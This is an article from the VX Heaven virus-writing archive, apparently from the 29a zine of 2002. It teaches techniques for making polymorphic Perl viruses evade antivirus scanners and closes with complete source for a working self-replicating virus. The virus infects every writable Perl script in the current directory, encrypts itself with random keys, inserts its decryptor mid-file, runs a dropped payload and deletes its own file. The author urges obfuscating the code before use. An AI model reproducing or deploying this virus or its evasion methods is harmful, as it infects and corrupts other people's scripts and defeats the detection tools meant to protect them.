Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Polymorphism in Perl Viruses

SnakeByte
29a [6]
March 2002

[Back to index] [Comments]
SnakeByte [ [email protected] ]
www.kryptocrew.de/snakebyte/

After writing something about EPO and Encryption in Perl Viruses I somehow felt that I also have to do this. So I will explain here some techniques which could be used in Perl to create polymorphic perl viruses.

There are several things we could do to make every infection of the virus different from all others, to confuse a possible Anti Virus Scanner. The first one is to add random, comments to each line :

 for ($a = 0; $a < @Virus; $a++){
  $comment = int(rand(65535));
  @Virus[$a] .= " \#$comment" ;
 }
 

You could also include characters or other stuff, but once there is a Scanner for perl viruses, the first thing it will do is to remove all comments =)

So this is very weak, but until there is a scanner, we could use this. Another thing we could do to make every virus different, is to change the linebreaks. In perl linebreaks are just used for better reading, so we could remove every linebreak and insert some, ( nearly ) everywhere we want to.

 printf("testme");
 printf("cool");

 could also be :

 printf(
 "testme"); printf("cool"
 );
 

so here could we get a nice range of variability =)

But once scanners are implemented, they will just remove all linebreaks, and unnecessairy spaces, so this would not help in the long run.

Ok, let's start with something that might also work in the long run, replacing all variables with others.

 $myvars2 = "MyVars:Virus:whatever:myvars2";          # all the variables you use
 @MyVars = split(":", $myvars2);                      # read them into an array
 for ( $x = 0; $x < @MyVars; $x++ ){
  $newVar = chr(int(rand(25)+65));                    # we take all letters
  $newVar .= int(rand(65535));                        # + a random number
  $Virus =~ [email protected][$x]/$newVar/;                   # and replace the variable =P
 }
 

Easy and effective, this makes string scanning useless and forces the AV's to use wildcards =) This is better poly than the one described above, but we can even go on. We could swap instructions when generating the decryptor, and use other ones, doing the same stuff ( don't think you need code for this *g* )

When swapping and replacing instructions, you are also able to insert trash code, like $DD34424 = "sdfk.lsdjfpi3"; to make the virus even more variable, such a trashcode generator should be written as a sub to be able to use simple expressions like

 $myCode .= "whatever" + &trashcode;
 

this way you can keep the code short and effective.

In my mind when you use EPO and Polymorphism in Perl Viruses AV's will have a very hard time to detect and remove perl viruses... ;)

Ok, this is a polymorphic perl virus which is using EPO techniques, To make this code useful strip the comments, remove linebreaks, and obfuscate it .. ;)

 # 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]  
 open(File,$0);@Virus=<File>;close(File);               # read own code
 $Virus=join("", @Virus);foreach $FileName(<*>) {       # get files
 if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {      # check file
 open(File, "$FileName");@Temp=<File>;close(File);      # open file
 if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) {     # perl file ?
  if (( length(@Temp[0]) % 5 ) != 0 ){                  # already infected ?
                                                        # first we generate a decryptor

 $Key = int(rand(255));                                 # cryptkey
 $crypttype = int(rand(2));                             # how to crypt it ?

 for ( $X = 0; $X < length($Virus); $X++ ){             # Encrypt it
  if ( $crypttype == 0 ){
   @Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key);  # Multiply
  } else {
   @Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key);  # Addition
  }
 }

 $connectit = chr(int(rand(25)+65));
 $VirString = join($connectit, @Crypt);                 # all values get seperated by a !
 $filename  =  chr(int(rand(25)+65));                   # random filename to put virus to
 $filename .= int(rand(65535));
     if ( int(rand(2)) == 0 ){
      @Vir[0] = "\$l1l = \"$VirString\"\;";
      @Vir[1] = "\$11l = $Key\;";                       # key to decrypt
     } else {
      @Vir[0] = "\$11l = $Key\;";                       # key to decrypt
      @Vir[1] = "\$l1l = \"$VirString\"\;";
     }
     @Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
     @Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { ";  # Decrypt Loop

     if ( $crypttype == 0 ){
      @Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;";       # Decrypt Char
     } else {
      @Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;";          # Decrypt Char
     }
     @Vir[5] = "}";
     @Vir[6] = "open(1l1, \">$filename\")\;";           # write encrypted
     @Vir[7] = "print 1l1 \$l11\;";                     # string to a file
     @Vir[8] = "close(1l1)\;";
     @Vir[9] = "\$lll = \`perl $filename\`;\n";         # and start it

                                                        # change variables
                                                        # $Virus File @Virus $X  $Key $Vir
                                                        # l1l    1l1  ll1    lll 11l  l11
    @vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
    foreach $replace (@vars){
     $newVar = chr(int(rand(25)+65));                   # with a letter
     $newVar .= int(rand(65535));                       # and a random number
     for ( $b=0; $b < @Vir; $b++){
      @Vir[$b] =~ s/$replace/$newVar/g ;
     }
    }


    do {
      chomp @Temp[0];
      @Temp[0] .= " \n";
    } until((length(@Temp[0]) % 5) == 0 );


    open(File, ">$FileName");                   # and write the infected
    $Temp = join("\n", @Vir);

 
    for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
      if ( @Temp[$X] =~ "\;\n" ) {              # insert virus in the middle
      $Temp2 = join("", @Temp[0..$X]);          # write first part
      print File $Temp2;                        # and virus
      print File $Temp; $X++;
      $Y = (@Temp);
      $Temp2 = join("", @Temp[$X..$Y]);         # insert rest of the file
      print File $Temp2;
      goto CloseFile;
     }
    }
 
     $Temp2 = join("", @Temp);                  # no possibility to insert virus
     print File $Temp;                          # file back to disk
     print File $Temp2;                         # without EPO


CloseFile:
     close(File);
 }}}}

 $a = `rm $0`;                                  # delete our selves..
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua